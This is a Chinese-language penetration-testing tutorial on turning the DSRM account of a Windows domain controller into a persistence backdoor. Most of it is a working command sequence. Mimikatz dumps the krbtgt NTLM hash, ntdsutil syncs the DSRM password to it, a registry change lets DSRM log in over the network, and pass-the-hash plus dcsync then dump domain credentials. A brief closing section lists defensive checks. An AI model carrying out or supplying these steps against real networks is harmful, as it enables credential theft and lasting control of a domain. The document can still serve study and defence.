• 1 修改 DSRM 密碼
• 2 DSRM 域後門操作過程
• 3 DSRM 域後門防禦

• 目錄服務恢復模式（DSRM，Directory Services Restore Mode），是Windows伺服器域控制器的安全模式啟動選項。每個域控制器都有一個本地管理員賬戶 (也就是DSRM賬戶)。
• DSRM用途：允許管理員在域環境中出現故障或崩潰時還原、修復、重建活動目錄資料庫，使域環境的執行恢復正常。在域環境建立初期，DSRM 的密碼需要在安裝 DC 時設定，且很少會被重置。修改 DSRM 密碼最基本的方法是在 DC 上執行ntdsutil 命令列修改。
• 在滲透測試： 可以使用DSRM對域環境進行持久化操作。適用版本為windows server2008（需安裝KB961320才可以使用指定域賬號的密碼對DSRM的密碼進行同步）及以後的版本，windows server2003不能使用此方法。
• 每個域控制器都有本地管理員賬號和密碼（與域管理員賬號和密碼不同）。DSRM賬號可以作為一個域控制器的本地管理員使用者，通過網路連線域控制器，進而控制域控制器。

1 修改 DSRM 密碼

# Win08（已安裝KB961320）及以上，可以將 DSRM 密碼同步為已存在的域賬號密碼。
NTDSUTIL：開啟ntdsutil
set DSRM password：修改DSRM的密碼
sync from domain account domainusername：使DSRM的密碼和指定域使用者的密碼同步
q(第1次)：退出DSRM密碼設定模式
q(第2次)：退出ntdsutil

# 補充，直接修改 DSRM密碼
NTDSUTIL：開啟ntdsutil
set DSRM password：修改DSRM的密碼
reset password on server null：在當前域控制器上恢復 DSRM 密碼
<PASSWORD>：修改後的密碼
q(第1次)：退出DSRM密碼設定模式
q(第2次)：退出ntdsutil
 

2 DSRM 域後門操作過程

1. 獲取 krbtgt 的 NTLM hash

   # 域控制器中使用mimikatz檢視 krbtgt 的 NTLM hash
   privilege::debug
   lsadump::lsa /patch /name:krbtgt
   
   # 得到NTLM : fa02a0e57e5ba9189d00990ae64e87ce
   

2. 檢視同步前與同步後 DSRM 賬號的 NTLM hash

   # 檢視同步前 DSRM 賬號的 NTLM hash
   token::elevate
   lsadump::sam
   
   # 將 DSRM 賬號和 krbtgt 的 NTLM Hash 同步
   NTDSUTIL
   set DSRM password
   sync from domain account krbtgt
   
   # 檢視同步後 DSRM 賬號的 NTLM hash
   lsadump::sam
    
   

3. 修改 DSRM 的登入方式

   DSRM有三種登入方式，具體如下：

   • 0：預設值，只有當域控制器重啟並進入DSRM模式時，才可以使用DSRM管理員賬號
   • 1：只有當本地AD、DS服務停止時，才可以使用DSRM管理員賬號登入域控制器
   • 2：在任何情況下，都可以使用DSRM管理員賬號登入域控制器
   • 在 Windows 對 DSRM 使用控制檯登入域控制器進行了限制。如果要使用DSRM賬號通過網路登入域控制器，需要將該值設定為2。

   New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD
   

4. 利用 mimikatz 使用 DSRM 賬號通過網路遠端登入域控制器

   # 在域成員機器的管理員(如本地管理員)模式下開啟 mimikatz
   privilege::debug
   sekurlsa::pth /domain:dc /user:administrator /ntlm:fa02a0e57e5ba9189d00990ae64e87ce
   
   # Hash 傳遞完成後，在彈出的命令列視窗中開啟mimikatz，使用 dcsync 功能遠端轉儲 hash。
   lsadump::dcsync /domain:test.lab /dc:dc /user:krbtgt
   
   dir \\dc\c$
   

3 DSRM 域後門防禦

1. 定期檢測登錄檔中用於控制 DSRM 登入方式的鍵值 hklm:\system\currentcontrolset\control\lsa\dsrmadminlogonbehavior ，確認該鍵值為 1。或者刪除該鍵值。
2. 定期修改域中所有域控制器的 DSRM 密碼。
3. 經常檢查 ID 為 4794 的日誌，嘗試設定活動目錄服務還原模式的管理員密碼會被記錄在4794日誌中。